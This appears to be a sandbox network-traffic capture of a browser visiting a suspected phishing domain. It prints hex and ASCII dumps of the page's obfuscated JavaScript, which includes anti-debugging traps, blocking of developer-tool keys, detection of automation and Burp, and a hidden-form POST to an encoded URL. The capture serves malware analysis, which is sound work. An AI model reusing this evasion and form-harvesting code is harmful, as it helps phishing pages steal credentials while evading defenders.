                                                            2025-01-15 16:02:02 UTC717INData Raw: 71 6f 6d 69 74 61 72 6e 6f 72 2e 72 75 2f 4a 59 31 48 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6d 53 74 6e 2e 71 6f 6d 69 74 61 72 6e 6f 72 2e 72 75 2f 4a 59 31 48 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 53 74 6e 2e 71 6f 6d 69 74 61 72 6e 6f 72 2e 72 75 2f 4a 59 31 48 2f 22 3e 68 74 74 70 73 3a 2f 2f 6d 53 74 6e 2e 71 6f 6d 69 74 61 72 6e 6f 72 2e 72 75 2f 4a 59 31 48 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f
                                                            Data Ascii: qomitarnor.ru/JY1H/'" /> <title>Redirecting to https://mStn.qomitarnor.ru/JY1H/</title> </head> <body> Redirecting to <a href="https://mStn.qomitarnor.ru/JY1H/">https://mStn.qomitarnor.ru/JY1H/</a>. <script defer src="https://
                                                            2025-01-15 16:02:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1649715188.114.96.34436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:02 UTC666OUTGET /JY1H/ HTTP/1.1
                                                            Host: mstn.qomitarnor.ru
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:03 UTC1236INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=irkYKPt6xmxjk25dNkFPf7x7dlyKv0AWsQSOztITGc4bPnDDMDQykci8TYsAigpdnfOQG7Po5iEdUKLWo1ynkUt4VUd5tiw6OrPdjW2NgkdfUYGMYoafrb1v22fa4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5008&min_rtt=4941&rtt_var=1435&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1576&delivery_rate=571887&cwnd=243&unsent_bytes=0&cid=9df8f3bf64355f2e&ts=131&x=0"
                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IklMOW9BbVA4YTg5YncyWmMzMzI5d1E9PSIsInZhbHVlIjoiZmxzV0t5MmNFemdKRzlvRkhqT3RzT2pKZTBlNVpxamZFV2Q3bDRiRkF2TFcxdlZWd3dpSm1lZDNhRUZ2SVVINVFicFZTRFdJeXZMRURGWi80amc0cHpDbjVRVFpnUks0YlFBZkxXdjJZbDZSRElGWFBzdEovMVFzVlQzNUY4ZnAiLCJtYWMiOiI5MGM5MTRjZmI3NzhkYTk0NTMzMTJjM2RmMDFiYzQ2MDg3ZDVhNWFkOWVkMGJjZDEwODY5NzUzMzc4NTAyODdiIiwidGFnIjoiIn0%3D; expires=Wed, 15-Jan-2025 18:02:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                            2025-01-15 16:02:03 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 74 69 5a 45 77 31 5a 6d 78 4a 4d 6c 52 70 63 48 56 44 4e 57 46 36 4f 58 68 31 53 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 31 46 31 64 6d 35 59 55 55 70 78 62 54 67 79 56 6b 34 34 4f 47 46 6c 4d 44 49 33 55 57 55 77 59 56 64 76 4e 6d 68 42 4c 30 68 4b 53 79 39 47 63 45 70 74 61 6b 46 4b 51 55 56 36 61 6b 4e 58 52 47 4e 42 59 56 6c 6a 55 45 52 53 4d 43 39 75 62 44 4a 59 64 32 68 46 4b 33 42 57 4b 31 52 48 4e 55 39 36 63 57 56 79 4e 6a 45 77 53 7a 46 42 61 31 5a 59 65 54 4e 61 55 6c 64 55 62 45 31 70 4f 57 46 35 4d 58 6b 31 53 46 64 6c 4e 7a 56 7a 56 54 56 4c 5a 45 35 6b 59 33 64 4e 53 32 4e 6d 59 58 5a 59 4b 32 68 61 53 43 38
                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IktiZEw1ZmxJMlRpcHVDNWF6OXh1SlE9PSIsInZhbHVlIjoiY1F1dm5YUUpxbTgyVk44OGFlMDI3UWUwYVdvNmhBL0hKSy9GcEptakFKQUV6akNXRGNBYVljUERSMC9ubDJYd2hFK3BWK1RHNU96cWVyNjEwSzFBa1ZYeTNaUldUbE1pOWF5MXk1SFdlNzVzVTVLZE5kY3dNS2NmYXZYK2haSC8
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 34 65 65 63 0d 0a 3c 21 2d 2d 20 49 66 20 79 6f 75 20 72 65 61 6c 6c 79 20 6c 6f 6f 6b 20 63 6c 6f 73 65 6c 79 2c 20 6d 6f 73 74 20 6f 76 65 72 6e 69 67 68 74 20 73 75 63 63 65 73 73 65 73 20 74 6f 6f 6b 20 61 20 6c 6f 6e 67 20 74 69 6d 65 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 6d 65 61 6e 73 20 64 6f 69 6e 67 20 74 68 65 20 62 65 73 74 20 77 65 20 63 61 6e 20 77 69 74 68 20 77 68 61 74 20 77 65 20 68 61 76 65 2e 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 64 6f 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 67 65 74 74 69 6e 67 3b 20 69 6e 20 74 68 65 20 74 72 79 69 6e 67 2c 20 6e 6f 74 20 74 68 65 20 74 72 69 75 6d 70 68 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 74 55 33
                                                            Data Ascii: 4eec... If you really look closely, most overnight successes took a long time. --><script>/* Success means doing the best we can with what we have. Success is the doing, not the getting; in the trying, not the triumph. */if(atob("aHR0cHM6Ly9tU3
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 4e 72 57 55 4e 79 61 30 6c 44 65 6d 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 32 74 5a 51 33 4a 72 53 55 4e 36 59 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 4e 72 57 55 4e 79 61 30 6c 44 65 6d 45 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 49 77 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61
                                                            Data Ascii: 13aWR0aDoxMjAwcHgpew0KI3NrWUNya0lDemEgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojc2tZQ3JrSUN6YSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3NrWUNya0lDemEuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTIwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlna
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33
                                                            Data Ascii: hbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 5a 32 31 69 49 44 30 67 4d 54 41 77 4f 77 30 4b 49 43 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 6c 53 47 56 58 52 46 4a 77 52 55 39 6d 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 42 64 33 52 32 56 48 68 52 54 47 68 45 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 42 64 33 52 32 56 48 68 52 54 47 68 45 49 43 30 67 5a 55 68 6c 56 30 52 53 63 45 56 50 5a 69 41
                                                            Data Ascii: Z21iID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBlSGVXRFJwRU9mID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBBd3R2VHhRTGhEID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChBd3R2VHhRTGhEIC0gZUhlV0RScEVPZiA
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 56 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 64 57 45 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6c 6c 4e 56 46 4e 78 63 6b 78 43
                                                            Data Ascii: mFsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHVhIiBuYW1lPSJibHRkdWEiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkZGF0YSIgbmFtZT0iYmx0ZGRhdGEiIHZhbHVlPSIiPg0KPC9mb3JtPg0KPC9kaXY+DQo8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9IllNVFNxckxC
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 52 6c 65 48 51 6f 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 64 47 56 34 64 43 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 61 57 59 6f 64 47 56 34 64 43 41 39 50 53 41 77 4b 58 73 4e 43 69 41 67 49 43 42 6d 5a 58 52 6a 61 43 68 71 63 30 70 53 59 6b 6c 7a 54 46 46 57 4c 43 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 31 6c 64 47 68 76 5a 44 6f 67 49 6c 42 50 55 31 51 69 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 64 30 78 69 57 47 39 4f 63 6c 64 72 63 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c
                                                            Data Ascii: RleHQoKQ0KICAgIH0pLnRoZW4odGV4dCA9PiB7DQogICAgaWYodGV4dCA9PSAwKXsNCiAgICBmZXRjaChqc0pSYklzTFFWLCB7DQogICAgICAgIG1ldGhvZDogIlBPU1QiLA0KICAgICAgICBib2R5OiBuZXcgRm9ybURhdGEod0xiWG9OcldrcCkNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlL
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 4b 6e 77 20 3d 20 6e 65 77 20 55 52 4c 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 74 55 33 52 75 4c 6e 46 76 62 57 6c 30 59 58 4a 75 62 33 49 75 63 6e 55 76 53 6c 6b 78 53 43 38 3d 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 45 71 5a 4b 57 69 45 75 49 46 20 3d 20 59 48 63 75 73 68 41 4b 6e 77 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 6f 70 5a 6f 77 4b 62 6e 55 47 20 3f 20 59 48 63 75 73 68 41 4b 6e 77 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 59 48 63 75 73 68 41 4b 6e 77 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 45 71 5a 4b 57 69 45 75 49 46 20 3d 3d 20 6f 70 5a 6f 77 4b 62 6e 55 47 29 7b 0d 0a 63 6f 6e 73 74 20 51 61 51 66 62 50 59 41 70 56 20 3d 20 77 69
                                                            Data Ascii: Knw = new URL(atob("aHR0cHM6Ly9tU3RuLnFvbWl0YXJub3IucnUvSlkxSC8="));const EqZKWiEuIF = YHcushAKnw.hostname === opZowKbnUG ? YHcushAKnw.hostname : YHcushAKnw.hostname.split('.').slice(-2).join('.');if(EqZKWiEuIF == opZowKbnUG){const QaQfbPYApV = wi
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 62 6a 73 4e 43 6e 30 4e 43 69 4e 7a 61 31 6c 44 63 6d 74 4a 51 33 70 68 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 33 4e 72 57 55 4e 79 61 30 6c 44 65 6d 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 4e 72 57 55 4e 79 61 30 6c 44 65 6d 45 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70
                                                            Data Ascii: bjsNCn0NCiNza1lDcmtJQ3phIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI3NrWUNya0lDemEgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3NrWUNya0lDemEgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp
                                                            2025-01-15 16:02:03 UTC1369INData Raw: 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 64 6c 59 6d 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30
                                                            Data Ascii: mF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1649718104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:04 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://mstn.qomitarnor.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:04 UTC386INHTTP/1.1 302 Found
                                                            Date: Wed, 15 Jan 2025 16:02:04 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                            cross-origin-resource-policy: cross-origin
                                                            location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                            Server: cloudflare
                                                            CF-RAY: 902716877b0d199d-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1649717151.101.2.1374436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:04 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://mstn.qomitarnor.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:04 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Age: 2441450
                                                            Date: Wed, 15 Jan 2025 16:02:04 GMT
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740052-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 0
                                                            X-Timer: S1736956924.065733,VS0,VE1
                                                            Vary: Accept-Encoding
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                            2025-01-15 16:02:04 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
